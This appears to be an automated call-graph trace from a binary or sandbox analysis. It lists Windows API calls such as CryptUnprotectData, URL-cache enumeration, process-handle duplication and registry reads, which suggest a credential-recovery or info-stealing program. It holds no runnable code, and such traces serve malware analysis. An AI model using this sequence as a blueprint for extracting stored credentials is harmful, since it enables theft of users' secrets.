FreeLibrary 38449->38451 38450->38231 38452 413666 38451->38452 38452->38231 39066 4449b9 38453->39066 38456 4449b9 42 API calls 38458 444b4b 38456->38458 38457 444c15 38459 4449b9 42 API calls 38457->38459 38458->38457 39087 444972 GetVersionExW 38458->39087 38461 444c1f 38459->38461 38461->38191 38462 444b99 memcmp 38467 444b8c 38462->38467 38463 444c0b 39091 444a85 42 API calls 38463->39091 38467->38462 38467->38463 39088 444aa5 42 API calls 38467->39088 39089 40a7a0 GetVersionExW 38467->39089 39090 444a85 42 API calls 38467->39090 38470 40399d 38469->38470 39092 403a16 38470->39092 38473 403a12 wcsrchr 38473->38198 38476 4039a3 38477 4039f4 38476->38477 38479 403a09 38476->38479 39103 40a02c CreateFileW 38476->39103 38478 4099c6 2 API calls 38477->38478 38477->38479 38478->38479 39106 40b1ab ??3@YAXPAX ??3@YAXPAX 38479->39106 38481 414c2e 16 API calls 38480->38481 38482 404048 38481->38482 38483 414c2e 16 API calls 38482->38483 38484 404056 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 404073 38485->38486 38487 409d1f 6 API calls 38486->38487 38488 40408e 38487->38488 38489 409d1f 6 API calls 38488->38489 38490 4040a6 38489->38490 38491 403af5 20 API calls 38490->38491 38492 4040ba 38491->38492 38493 403af5 20 API calls 38492->38493 38494 4040cb 38493->38494 39133 40414f memset 38494->39133 38496 404140 39147 40b1ab ??3@YAXPAX ??3@YAXPAX 38496->39147 38497 4040ec memset 38501 4040e0 38497->38501 38499 404148 38499->38259 38500 4099c6 2 API calls 38500->38501 38501->38496 38501->38497 38501->38500 38502 40a8ab 9 API calls 38501->38502 38502->38501 39160 40a6e6 WideCharToMultiByte 38503->39160 38505 4087ed 39161 4095d9 memset 38505->39161 38508 408809 memset memset memset memset memset 38509 40b2cc 27 API calls 38508->38509 38510 4088a1 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088b1 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088c0 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088d0 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088df 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 4088ef 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 4088fe 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40890e 38523->38524 38525 40b2cc 27 API calls 38524->38525 38526 40891d 38525->38526 38527 409d1f 6 API calls 38526->38527 38528 40892d 38527->38528 39180 409b98 GetFileAttributesW 38528->39180 38530 40893e 38531 408943 38530->38531 38532 408958 38530->38532 39181 407fdf 75 API calls 38531->39181 39182 409b98 GetFileAttributesW 38532->39182 38535 408964 38536 408969 38535->38536 38537 40897b 38535->38537 39183 4082c7 199 API calls 38536->39183 39184 409b98 GetFileAttributesW 38537->39184 38540 408953 38540->38259 38555 40b633 ??3@YAXPAX 38554->38555 38556 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38555->38556 38557 413f00 Process32NextW 38556->38557 38558 413da5 OpenProcess 38557->38558 38559 413f17 CloseHandle 38557->38559 38560 413eb0 38558->38560 38561 413df3 memset 38558->38561 38559->38299 38560->38557 38563 413ebf ??3@YAXPAX 38560->38563 38564 4099f4 3 API calls 38560->38564 39472 413f27 38561->39472 38563->38560 38564->38560 38566 413e37 GetModuleHandleW 38567 413e1f 38566->38567 38568 413e46 GetProcAddress 38566->38568 38567->38566 39477 413959 38567->39477 39493 413ca4 38567->39493 38568->38567 38570 413ea2 CloseHandle 38570->38560 38572 414c2e 16 API calls 38571->38572 38573 403eb7 38572->38573 38574 414c2e 16 API calls 38573->38574 38575 403ec5 38574->38575 38576 409d1f 6 API calls 38575->38576 38577 403ee2 38576->38577 38578 409d1f 6 API calls 38577->38578 38579 403efd 38578->38579 38580 409d1f 6 API calls 38579->38580 38581 403f15 38580->38581 38582 403af5 20 API calls 38581->38582 38583 403f29 38582->38583 38584 403af5 20 API calls 38583->38584 38585 403f3a 38584->38585 38586 40414f 33 API calls 38585->38586 38592 403f4f 38586->38592 38587 403faf 39507 40b1ab ??3@YAXPAX ??3@YAXPAX 38587->39507 38589 403f5b memset 38589->38592 38590 403fb7 38590->38243 38591 4099c6 2 API calls 38591->38592 38592->38587 38592->38589 38592->38591 38593 40a8ab 9 API calls 38592->38593 38593->38592 38595 414c2e 16 API calls 38594->38595 38596 403d26 38595->38596 38597 414c2e 16 API calls 38596->38597 38598 403d34 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 403d51 38599->38600 38601 409d1f 6 API calls 38600->38601 38602 403d6c 38601->38602 38603 409d1f 6 API calls 38602->38603 38604 403d84 38603->38604 38605 403af5 20 API calls 38604->38605 38606 403d98 38605->38606 38607 403af5 20 API calls 38606->38607 38608 403da9 38607->38608 38609 40414f 33 API calls 38608->38609 38615 403dbe 38609->38615 38610 403e1e 39508 40b1ab ??3@YAXPAX ??3@YAXPAX 38610->39508 38611 403dca memset 38611->38615 38613 403e26 38613->38247 38614 4099c6 2 API calls 38614->38615 38615->38610 38615->38611 38615->38614 38616 40a8ab 9 API calls 38615->38616 38616->38615 38618 414b81 9 API calls 38617->38618 38619 414c40 38618->38619 38620 414c73 memset 38619->38620 39509 409cea 38619->39509 38622 414c94 38620->38622 39512 414592 RegOpenKeyExW 38622->39512 38625 414cc1 38627 414cf4 wcscpy 38625->38627 39513 414bb0 wcscpy 38625->39513 38626 414c64 38626->38237 38627->38626 38629 414cd2 39514 4145ac RegQueryValueExW 38629->39514 38631 414ce9 RegCloseKey 38631->38627 38633 409d62 38632->38633 38634 409d43 wcscpy 38632->38634 38633->38278 38635 409719 2 API calls 38634->38635 38636 409d51 wcscat 38635->38636 38636->38633 38638 40aebe FindClose 38637->38638 38639 40ae21 38638->38639 38640 4099c6 2 API calls 38639->38640 38641 40ae35 38640->38641 38642 409d1f 6 API calls 38641->38642 38643 40ae49 38642->38643 38643->38345 38645 40ade0 38644->38645 38646 40ae0f 38644->38646 38645->38646 38647 40ade7 wcscmp 38645->38647 38646->38345 38647->38646 38648 40adfe wcscmp 38647->38648 38648->38646 38650 40ae18 9 API calls 38649->38650 38656 4453c4 38650->38656 38651 40ae51 9 API calls 38651->38656 38652 4453f3 38653 40aebe FindClose 38652->38653 38655 4453fe 38653->38655 38654 40add4 2 API calls 38654->38656 38655->38345 38656->38651 38656->38652 38656->38654 38657 445403 254 API calls 38656->38657 38657->38656 38659 40ae7b FindNextFileW 38658->38659 38660 40ae5c FindFirstFileW 38658->38660 38661 40ae94 38659->38661 38662 40ae8f 38659->38662 38660->38661 38664 40aeb6 38661->38664 38665 409d1f 6 API calls 38661->38665 38663 40aebe FindClose 38662->38663 38663->38661 38664->38345 38665->38664 38666->38214 38667->38302 38668->38286 38669->38286 38670->38316 38672 409c89 38671->38672 38672->38341 38673->38370 38675 413d39 38674->38675 38676 413d2f FreeLibrary 38674->38676 38677 40b633 ??3@YAXPAX 38675->38677 38676->38675 38678 413d42 38677->38678 38679 40b633 ??3@YAXPAX 38678->38679 38680 413d4a 38679->38680 38680->38333 38681->38200 38682->38201 38683->38271 38685 44db70 38684->38685 38686 40b6fc memset 38685->38686 38687 409c70 2 API calls 38686->38687 38688 40b732 wcsrchr 38687->38688 38689 40b743 38688->38689 38690 40b746 memset 38688->38690 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 40b76f 38691->38692 38693 409d1f 6 API calls 38692->38693 38694 40b783 38693->38694 39515 409b98 GetFileAttributesW 38694->39515 38696 40b792 38697 409c70 2 API calls 38696->38697 38711 40b7c2 38696->38711 38699 40b7a5 38697->38699 38701 40b2cc 27 API calls 38699->38701 38705 40b7b2 38701->38705 38702 40b837 FindCloseChangeNotification 38704 40b83e memset 38702->38704 38703 40b817 39550 409a45 GetTempPathW 38703->39550 39549 40a6e6 WideCharToMultiByte 38704->39549 38708 409d1f 6 API calls 38705->38708 38708->38711 38709 40b827 CopyFileW 38709->38704 38710 40b866 38712 444432 121 API calls 38710->38712 39516 40bb98 38711->39516 38713 40b879 38712->38713 38714 40bad5 38713->38714 38715 40b273 27 API calls 38713->38715 38716 40baeb 38714->38716 38717 40bade DeleteFileW 38714->38717 38718 40b89a 38715->38718 38719 40b04b ??3@YAXPAX 38716->38719 38717->38716 38720 438552 134 API calls 38718->38720 38721 40baf3 38719->38721 38722 40b8a4 38720->38722 38721->38203 38723 40bacd 38722->38723 38725 4251c4 137 API calls 38722->38725 38724 443d90 111 API calls 38723->38724 38724->38714 38748 40b8b8 38725->38748 38726 40bac6 39562 424f26 123 API calls 38726->39562 38727 40b8bd memset 39553 425413 17 API calls 38727->39553 38730 425413 17 API calls 38730->38748 38733 40a71b MultiByteToWideChar 38733->38748 38734 40a734 MultiByteToWideChar 38734->38748 38737 40b9b5 memcmp 38737->38748 38738 4099c6 2 API calls 38738->38748 38739 404423 38 API calls 38739->38748 38742 40bb3e memset memcpy 39563 40a734 MultiByteToWideChar 38742->39563 38743 4251c4 137 API calls 38743->38748 38745 40bb88 LocalFree 38745->38748 38748->38726 38748->38727 38748->38730 38748->38733 38748->38734 38748->38737 38748->38738 38748->38739 38748->38742 38748->38743 38749 40ba5f memcmp 38748->38749 39554 4253ef 16 API calls 38748->39554 39555 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38748->39555 39556 4253af 17 API calls 38748->39556 39557 4253cf 17 API calls 38748->39557 39558 447280 memset 38748->39558 39559 447960 memset memcpy memcpy memcpy 38748->39559 39560 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38748->39560 39561 447920 memcpy memcpy memcpy 38748->39561 38749->38748 38750->38282 38752 40aed1 38751->38752 38753 40aec7 FindClose 38751->38753 38752->38211 38753->38752 38755 4099d7 38754->38755 38756 4099da memcpy 38754->38756 38755->38756 38756->38258 38758 40b2cc 27 API calls 38757->38758 38759 44543f 38758->38759 38760 409d1f 6 API calls 38759->38760 38761 44544f 38760->38761 39655 409b98 GetFileAttributesW 38761->39655 38763 445476 38766 40b2cc 27 API calls 38763->38766 38764 44545e 38764->38763 38765 40b6ef 253 API calls 38764->38765 38765->38763 38767 445482 38766->38767 38768 409d1f 6 API calls 38767->38768 38769 445492 38768->38769 39656 409b98 GetFileAttributesW 38769->39656 38771 4454a1 38772 4454b9 38771->38772 38773 40b6ef 253 API calls 38771->38773 38772->38284 38773->38772 38774->38283 38775->38307 38776->38313 38777->38348 38778->38329 38779->38373 38780->38373 38781->38359 38782->38389 38783->38391 38784->38393 38786 414c2e 16 API calls 38785->38786 38787 40c2ae 38786->38787 38857 40c1d3 38787->38857 38792 40c3be 38809 40a8ab 38792->38809 38793 40afcf 2 API calls 38794 40c2fd FindFirstUrlCacheEntryW 38793->38794 38795 40c3b6 38794->38795 38796 40c31e wcschr 38794->38796 38797 40b04b ??3@YAXPAX 38795->38797 38798 40c331 38796->38798 38799 40c35e FindNextUrlCacheEntryW 38796->38799 38797->38792 38800 40a8ab 9 API calls 38798->38800 38799->38796 38801 40c373 GetLastError 38799->38801 38804 40c33e wcschr 38800->38804 38802 40c3ad FindCloseUrlCache 38801->38802 38803 40c37e 38801->38803 38802->38795 38805 40afcf 2 API calls 38803->38805 38804->38799 38806 40c34f 38804->38806 38807 40c391 FindNextUrlCacheEntryW 38805->38807 38808 40a8ab 9 API calls 38806->38808 38807->38796 38807->38802 38808->38799 38951 40a97a 38809->38951 38812 40a8cc 38812->38400 38813 40a8d0 7 API calls 38813->38812 38956 40b1ab ??3@YAXPAX ??3@YAXPAX 38814->38956 38816 40c3dd 38817 40b2cc 27 API calls 38816->38817 38818 40c3e7 38817->38818 38957 414592 RegOpenKeyExW 38818->38957 38820 40c3f4 38821 40c50e 38820->38821 38822 40c3ff 38820->38822 38836 405337 38821->38836 38823 40a9ce 4 API calls 38822->38823 38824 40c418 memset 38823->38824 38958 40aa1d 38824->38958 38827 40c471 38829 40c47a _wcsupr 38827->38829 38828 40c505 RegCloseKey 38828->38821 38830 40a8d0 7 API calls 38829->38830 38831 40c498 38830->38831 38832 40a8d0 7 API calls 38831->38832 38833 40c4ac memset 38832->38833 38834 40aa1d 38833->38834 38835 40c4e4 RegEnumValueW 38834->38835 38835->38828 38835->38829 38960 405220 38836->38960 38840 4099c6 2 API calls 38839->38840 38841 40a714 _wcslwr 38840->38841 38842 40c634 38841->38842 39017 405361 38842->39017 38845 40c65c wcslen 39020 4053b6 39 API calls 38845->39020 38846 40c71d wcslen 38846->38414 38848 40c677 38849 40c713 38848->38849 39021 40538b 39 API calls 38848->39021 39023 4053df 39 API calls 38849->39023 38852 40c6a5 38852->38849 38853 40c6a9 memset 38852->38853 38854 40c6d3 38853->38854 39022 40c589 44 API calls 38854->39022 38856->38407 38858 40ae18 9 API calls 38857->38858 38864 40c210 38858->38864 38859 40ae51 9 API calls 38859->38864 38860 40c264 38861 40aebe FindClose 38860->38861 38863 40c26f 38861->38863 38862 40add4 2 API calls 38862->38864 38869 40e5ed memset memset 38863->38869 38864->38859 38864->38860 38864->38862 38865 40c231 _wcsicmp 38864->38865 38866 40c1d3 35 API calls 38864->38866 38865->38864 38867 40c248 38865->38867 38866->38864 38882 40c084 22 API calls 38867->38882 38870 414c2e 16 API calls 38869->38870 38871 40e63f 38870->38871 38872 409d1f 6 API calls 38871->38872 38873 40e658 38872->38873 38883 409b98 GetFileAttributesW 38873->38883 38875 40e667 38876 40e680 38875->38876 38877 409d1f 6 API calls 38875->38877 38884 409b98 GetFileAttributesW 38876->38884 38877->38876 38879 40e68f 38881 40c2d8 38879->38881 38885 40e4b2 38879->38885 38881->38792 38881->38793 38882->38864 38883->38875 38884->38879 38906 40e01e 38885->38906 38887 40e521 38888 40e593 38887->38888 38929 40e175 38887->38929 38889 40e5b0 38888->38889 38890 40e59c DeleteFileW 38888->38890 38891 40b04b ??3@YAXPAX 38889->38891 38890->38889 38893 40e5bb 38891->38893 38894 40e5c4 CloseHandle 38893->38894 38895 40e5cc 38893->38895 38894->38895 38897 40b633 ??3@YAXPAX 38895->38897 38896 40e573 38899 40e584 38896->38899 38900 40e57c FindCloseChangeNotification 38896->38900 38898 40e5db 38897->38898 38902 40b633 ??3@YAXPAX 38898->38902 38950 40b1ab ??3@YAXPAX ??3@YAXPAX 38899->38950 38900->38899 38901 40e540 38901->38896 38949 40e2ab 30 API calls 38901->38949 38904 40e5e3 38902->38904 38904->38881 38907 406214 22 API calls 38906->38907 38908 40e03c 38907->38908 38909 40e16b 38908->38909 38910 40dd85 74 API calls 38908->38910 38909->38887 38911 40e06b 38910->38911 38911->38909 38912 40afcf ??2@YAPAXI ??3@YAXPAX 38911->38912 38913 40e08d OpenProcess 38912->38913 38914 40e0a4 GetCurrentProcess DuplicateHandle 38913->38914 38918 40e152 38913->38918 38915 40e0d0 GetFileSize 38914->38915 38916 40e14a CloseHandle 38914->38916 38919 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38915->38919 38916->38918 38917 40e160 38921 40b04b ??3@YAXPAX 38917->38921 38918->38917 38920 406214 22 API calls 38918->38920 38922 40e0ea 38919->38922 38920->38917 38921->38909 38923 4096dc CreateFileW 38922->38923 38924 40e0f1 CreateFileMappingW 38923->38924 38925 40e140 CloseHandle CloseHandle 38924->38925 38926 40e10b MapViewOfFile 38924->38926 38925->38916 38927 40e13b FindCloseChangeNotification 38926->38927 38928 40e11f WriteFile UnmapViewOfFile 38926->38928 38927->38925 38928->38927 38930 40e18c 38929->38930 38931 406b90 11 API calls 38930->38931 38932 40e19f 38931->38932 38933 40e1a7 memset 38932->38933 38934 40e299 38932->38934 38939 40e1e8 38933->38939 38935 4069a3 ??3@YAXPAX ??3@YAXPAX 38934->38935 38936 40e2a4 38935->38936 38936->38901 38937 406e8f 13 API calls 38937->38939 38938 406b53 SetFilePointerEx ReadFile 38938->38939 38939->38937 38939->38938 38940 40e283 38939->38940 38941 40dd50 _wcsicmp 38939->38941 38945 40742e 8 API calls 38939->38945 38946 40aae3 wcslen wcslen _memicmp 38939->38946 38947 40e244 _snwprintf 38939->38947 38942 40e291 38940->38942 38943 40e288 ??3@YAXPAX 38940->38943 38941->38939 38944 40aa04 ??3@YAXPAX 38942->38944 38943->38942 38944->38934 38945->38939 38946->38939 38948 40a8d0 7 API calls 38947->38948 38948->38939 38949->38901 38950->38888 38953 40a980 38951->38953 38952 40a8bb 38952->38812 38952->38813 38953->38952 38954 40a995 _wcsicmp 38953->38954 38955 40a99c wcscmp 38953->38955 38954->38953 38955->38953 38956->38816 38957->38820 38959 40aa23 RegEnumValueW 38958->38959 38959->38827 38959->38828 38961 405335 38960->38961 38962 40522a 38960->38962 38961->38414 38963 40b2cc 27 API calls 38962->38963 38964 405234 38963->38964 38965 40a804 8 API calls 38964->38965 38966 40523a 38965->38966 39005 40b273 38966->39005 38968 405248 _mbscpy _mbscat GetProcAddress 38969 40b273 27 API calls 38968->38969 38970 405279 38969->38970 39008 405211 GetProcAddress 38970->39008 38972 405282 38973 40b273 27 API calls 38972->38973 38974 40528f 38973->38974 39009 405211 GetProcAddress 38974->39009 38976 405298 38977 40b273 27 API calls 38976->38977 38978 4052a5 38977->38978 39010 405211 GetProcAddress 38978->39010 38980 4052ae 38981 40b273 27 API calls 38980->38981 38982 4052bb 38981->38982 39011 405211 GetProcAddress 38982->39011 38984 4052c4 38985 40b273 27 API calls 38984->38985 38986 4052d1 38985->38986 39012 405211 GetProcAddress 38986->39012 38988 4052da 38989 40b273 27 API calls 38988->38989 38990 4052e7 38989->38990 39013 405211 GetProcAddress 38990->39013 38992 4052f0 38993 40b273 27 API calls 38992->38993 38994 4052fd 38993->38994 39014 405211 GetProcAddress 38994->39014 38996 405306 38997 40b273 27 API calls 38996->38997 38998 405313 38997->38998 39015 405211 GetProcAddress 38998->39015 39000 40531c 39001 40b273 27 API calls 39000->39001 39002 405329 39001->39002 39016 405211 GetProcAddress 39002->39016 39004 405332 39004->38961 39006 40b58d 27 API calls 39005->39006 39007 40b18c 39006->39007 39007->38968 39008->38972 39009->38976 39010->38980 39011->38984 39012->38988 39013->38992 39014->38996 39015->39000 39016->39004 39018 405220 39 API calls 39017->39018 39019 405369 39018->39019 39019->38845 39019->38846 39020->38848 39021->38852 39022->38849 39023->38846 39025 40440c FreeLibrary 39024->39025 39026 40436d 39025->39026 39027 40a804 8 API calls 39026->39027 39028 404377 39027->39028 39029 404383 39028->39029 39030 404405 39028->39030 39031 40b273 27 API calls 39029->39031 39030->38419 39030->38421 39030->38422 39032 40438d GetProcAddress 39031->39032 39033 40b273 27 API calls 39032->39033 39034 4043a7 GetProcAddress 39033->39034 39035 40b273 27 API calls 39034->39035 39036 4043ba GetProcAddress 39035->39036 39037 40b273 27 API calls 39036->39037 39038 4043ce GetProcAddress 39037->39038 39039 40b273 27 API calls 39038->39039 39040 4043e2 GetProcAddress 39039->39040 39041 4043f1 39040->39041 39042 4043f7 39041->39042 39043 40440c FreeLibrary 39041->39043 39042->39030 39043->39030 39045 404413 FreeLibrary 39044->39045 39046 40441e 39044->39046 39045->39046 39046->38436 39047->38432 39049 40447e 39048->39049 39050 40442e 39048->39050 39051 404485 CryptUnprotectData 39049->39051 39053 40449c 39049->39053 39052 40b2cc 27 API calls 39050->39052 39051->39053 39054 404438 39052->39054 39053->38432 39055 40a804 8 API calls 39054->39055 39056 40443e 39055->39056 39057 404445 39056->39057 39058 404467 39056->39058 39059 40b273 27 API calls 39057->39059 39058->39049 39061 404475 FreeLibrary 39058->39061 39060 40444f GetProcAddress 39059->39060 39060->39058 39062 404460 39060->39062 39061->39049 39062->39058 39064 4135f6 39063->39064 39065 4135eb FreeLibrary 39063->39065 39064->38439 39065->39064 39067 4449c4 39066->39067 39068 444a52 39066->39068 39069 40b2cc 27 API calls 39067->39069 39068->38456 39068->38461 39070 4449cb 39069->39070 39071 40a804 8 API calls 39070->39071 39072 4449d1 39071->39072 39073 40b273 27 API calls 39072->39073 39074 4449dc GetProcAddress 39073->39074 39075 40b273 27 API calls 39074->39075 39076 4449f3 GetProcAddress 39075->39076 39077 40b273 27 API calls 39076->39077 39078 444a04 GetProcAddress 39077->39078 39079 40b273 27 API calls 39078->39079 39080 444a15 GetProcAddress 39079->39080 39081 40b273 27 API calls 39080->39081 39082 444a26 GetProcAddress 39081->39082 39083 40b273 27 API calls 39082->39083 39084 444a37 GetProcAddress 39083->39084 39085 40b273 27 API calls 39084->39085 39086 444a48 GetProcAddress 39085->39086 39086->39068 39087->38467 39088->38467 39089->38467 39090->38467 39091->38457 39093 403a29 39092->39093 39107 403bed memset memset 39093->39107 39095 403a2f 39096 403ae7 39095->39096 39097 403a3f memset 39095->39097 39100 409d1f 6 API calls 39095->39100 39101 409b98 GetFileAttributesW 39095->39101 39102 40a8d0 7 API calls 39095->39102 39120 40b1ab ??3@YAXPAX ??3@YAXPAX 39096->39120 39097->39095 39099 403aef 39099->38476 39100->39095 39101->39095 39102->39095 39104 40a051 GetFileTime FindCloseChangeNotification 39103->39104 39105 4039ca CompareFileTime 39103->39105 39104->39105 39105->38476 39106->38473 39108 414c2e 16 API calls 39107->39108 39109 403c38 39108->39109 39110 409719 2 API calls 39109->39110 39111 403c3f wcscat 39110->39111 39112 414c2e 16 API calls 39111->39112 39113 403c61 39112->39113 39114 409719 2 API calls 39113->39114 39115 403c68 wcscat 39114->39115 39121 403af5 39115->39121 39118 403af5 20 API calls 39119 403c95 39118->39119 39119->39095 39120->39099 39122 403b02 39121->39122 39123 40ae18 9 API calls 39122->39123 39125 403b37 39123->39125 39124 40ae51 9 API calls 39124->39125 39125->39124 39126 403bdb 39125->39126 39127 40add4 wcscmp wcscmp 39125->39127 39130 40ae18 9 API calls 39125->39130 39131 40aebe FindClose 39125->39131 39132 40a8d0 7 API calls 39125->39132 39128 40aebe FindClose 39126->39128 39127->39125 39129 403be6 39128->39129 39129->39118 39130->39125 39131->39125 39132->39125 39134 409d1f 6 API calls 39133->39134 39135 404190 39134->39135 39148 409b98 GetFileAttributesW 39135->39148 39137 40419c 39138 4041a7 6 API calls 39137->39138 39139 40435c 39137->39139 39141 40424f 39138->39141 39139->38501 39141->39139 39142 40425e memset 39141->39142 39144 409d1f 6 API calls 39141->39144 39145 40a8ab 9 API calls 39141->39145 39149 414842 39141->39149 39142->39141 39143 404296 wcscpy 39142->39143 39143->39141 39144->39141 39146 4042b6 memset memset _snwprintf wcscpy 39145->39146 39146->39141 39147->38499 39148->39137 39152 41443e 39149->39152 39151 414866 39151->39141 39153 41444b 39152->39153 39154 414451 39153->39154 39155 4144a3 GetPrivateProfileStringW 39153->39155 39156 414491 39154->39156 39157 414455 wcschr 39154->39157 39155->39151 39159 414495 WritePrivateProfileStringW 39156->39159 39157->39156 39158 414463 _snwprintf 39157->39158 39158->39159 39159->39151 39160->38505 39162 40b2cc 27 API calls 39161->39162 39163 409615 39162->39163 39164 409d1f 6 API calls 39163->39164 39165 409625 39164->39165 39190 409b98 GetFileAttributesW 39165->39190 39167 409634 39168 409648 39167->39168 39191 4091b8 memset 39167->39191 39170 40b2cc 27 API calls 39168->39170 39172 408801 39168->39172 39171 40965d 39170->39171 39173 409d1f 6 API calls 39171->39173 39172->38508 39172->38540 39174 40966d 39173->39174 39243 409b98 GetFileAttributesW 39174->39243 39176 40967c 39176->39172 39177 409681 39176->39177 39244 409529 72 API calls 39177->39244 39179 409690 39179->39172 39180->38530 39181->38540 39182->38535 39183->38540 39190->39167 39245 40a6e6 WideCharToMultiByte 39191->39245 39193 409202 39246 444432 39193->39246 39196 40b273 27 API calls 39197 409236 39196->39197 39292 438552 39197->39292 39200 409383 39202 40b273 27 API calls 39200->39202 39204 409399 39202->39204 39203 409254 39205 40937b 39203->39205 39313 4253cf 17 API calls 39203->39313 39206 438552 134 API calls 39204->39206 39317 424f26 123 API calls 39205->39317 39224 4093a3 39206->39224 39209 409267 39314 4253cf 17 API calls 39209->39314 39210 4094ff 39321 443d90 39210->39321 39213 4251c4 137 API calls 39213->39224 39215 409507 39223 40951d 39215->39223 39341 408f2f 77 API calls 39215->39341 39217 4093df 39320 424f26 123 API calls 39217->39320 39221 4253cf 17 API calls 39221->39224 39223->39168 39224->39210 39224->39213 39224->39217 39224->39221 39226 4093e4 39224->39226 39318 4253af 17 API calls 39226->39318 39233 4093ed 39319 4253af 17 API calls 39233->39319 39236 4093f9 39236->39217 39237 409409 memcmp 39236->39237 39237->39217 39238 409421 memcmp 39237->39238 39239 4094a4 memcmp 39238->39239 39240 409435 39238->39240 39239->39217 39240->39217 39243->39176 39244->39179 39245->39193 39342 4438b5 39246->39342 39248 44444c 39249 409215 39248->39249 39356 415a6d 39248->39356 39249->39196 39249->39223 39251 4442e6 11 API calls 39252 44469e 39251->39252 39252->39249 39255 443d90 111 API calls 39252->39255 39253 444486 39254 4444b9 memcpy 39253->39254 39280 4444a4 39253->39280 39360 415258 39254->39360 39255->39249 39257 444524 39258 444541 39257->39258 39259 44452a 39257->39259 39363 444316 39258->39363 39260 416935 16 API calls 39259->39260 39260->39280 39263 444316 18 API calls 39264 444563 39263->39264 39265 444316 18 API calls 39264->39265 39266 44456f 39265->39266 39267 444316 18 API calls 39266->39267 39268 44457f 39267->39268 39268->39280 39377 432d4e 39268->39377 39280->39251 39430 438460 39292->39430 39294 409240 39294->39200 39295 4251c4 39294->39295 39442 424f07 39295->39442 39297 4251e4 39298 4251f7 39297->39298 39299 4251e8 39297->39299 39450 4250f8 39298->39450 39449 4446ea 11 API calls 39299->39449 39301 4251f2 39301->39203 39303 425209 39306 425249 39303->39306 39309 4250f8 127 API calls 39303->39309 39310 425287 39303->39310 39458 4384e9 135 API calls 39303->39458 39459 424f74 124 API calls 39303->39459 39306->39310 39309->39303 39313->39209 39317->39200 39318->39233 39319->39236 39320->39210 39322 443da3 39321->39322 39323 443db6 39321->39323 39466 41707a 11 API calls 39322->39466 39323->39215 39325 443da8 39326 443dbc 39325->39326 39327 443dac 39325->39327 39468 4300e8 memset memset memcpy 39326->39468 39467 4446ea 11 API calls 39327->39467 39341->39223 39343 4438d0 39342->39343 39352 4438c9 39342->39352 39344 415378 memcpy memcpy 39343->39344 39345 4438d5 39344->39345 39346 4154e2 10 API calls 39345->39346 39347 443906 39345->39347 39345->39352 39346->39347 39348 443970 memset 39347->39348 39347->39352 39351 44398b 39348->39351 39349 4439a0 39350 415700 10 API calls 39349->39350 39349->39352 39354 4439c0 39350->39354 39351->39349 39353 41975c 10 API calls 39351->39353 39352->39248 39353->39349 39354->39352 39355 418981 10 API calls 39354->39355 39355->39352 39357 415a77 39356->39357 39358 415a8d 39357->39358 39359 415a7e memset 39357->39359 39358->39253 39359->39358 39361 4438b5 11 API calls 39360->39361 39362 41525d 39361->39362 39362->39257 39364 444328 39363->39364 39365 444423 39364->39365 39366 44434e 39364->39366 39367 4446ea 11 API calls 39365->39367 39368 432d4e memset memset memcpy 39366->39368 39375 444381 39367->39375 39369 44435a 39368->39369 39371 444375 39369->39371 39376 44438b 39369->39376 39370 432d4e memset memset memcpy 39372 4443ec 39370->39372 39373 416935 16 API calls 39371->39373 39374 416935 16 API calls 39372->39374 39372->39375 39373->39375 39374->39375 39375->39263 39376->39370 39378 432d65 39377->39378 39379 432d58 39377->39379 39431 41703f 11 API calls 39430->39431 39432 43847a 39431->39432 39433 43848a 39432->39433 39434 43847e 39432->39434 39436 438270 134 API calls 39433->39436 39435 4446ea 11 API calls 39434->39435 39438 438488 39435->39438 39437 4384aa 39436->39437 39437->39438 39439 424f26 123 API calls 39437->39439 39438->39294 39440 4384bb 39439->39440 39441 438270 134 API calls 39440->39441 39441->39438 39443 424f1f 39442->39443 39444 424f0c 39442->39444 39446 424eea 11 API calls 39443->39446 39445 416760 11 API calls 39444->39445 39447 424f18 39445->39447 39448 424f24 39446->39448 39447->39297 39448->39297 39449->39301 39451 425108 39450->39451 39457 42510d 39450->39457 39452 424f74 124 API calls 39451->39452 39452->39457 39453 42569b 125 API calls 39454 42516e 39453->39454 39456 415c7d 16 API calls 39454->39456 39455 425115 39455->39303 39456->39455 39457->39453 39457->39455 39458->39303 39459->39303 39466->39325 39467->39323 39499 413f4f 39472->39499 39475 413f37 K32GetModuleFileNameExW 39476 413f4a 39475->39476 39476->38567 39478 413969 wcscpy 39477->39478 39479 41396c wcschr 39477->39479 39491 413a3a 39478->39491 39479->39478 39481 41398e 39479->39481 39504 4097f7 wcslen wcslen _memicmp 39481->39504 39483 41399a 39484 4139a4 memset 39483->39484 39485 4139e6 39483->39485 39505 409dd5 GetWindowsDirectoryW wcscpy 39484->39505 39487 413a31 wcscpy 39485->39487 39488 4139ec memset 39485->39488 39487->39491 39506 409dd5 GetWindowsDirectoryW wcscpy 39488->39506 39489 4139c9 wcscpy wcscat 39489->39491 39491->38567 39492 413a11 memcpy wcscat 39492->39491 39494 413cb0 GetModuleHandleW 39493->39494 39495 413cda 39493->39495 39494->39495 39496 413cbf GetProcAddress 39494->39496 39497 413ce3 GetProcessTimes 39495->39497 39498 413cf6 39495->39498 39496->39495 39497->38570 39498->38570 39500 413f2f 39499->39500 39501 413f54 39499->39501 39500->39475 39500->39476 39502 40a804 8 API calls 39501->39502 39503 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39502->39503 39503->39500 39504->39483 39505->39489 39506->39492 39507->38590 39508->38613 39510 409cf9 GetVersionExW 39509->39510 39511 409d0a 39509->39511 39510->39511 39511->38620 39511->38626 39512->38625 39513->38629 39514->38631 39515->38696 39517 40bba5 39516->39517 39564 40cc26 39517->39564 39520 40bd4b 39585 40cc0c 39520->39585 39525 40b2cc 27 API calls 39526 40bbef 39525->39526 39592 40ccf0 _wcsicmp 39526->39592 39528 40bbf5 39528->39520 39593 40ccb4 6 API calls 39528->39593 39530 40bc26 39531 40cf04 17 API calls 39530->39531 39532 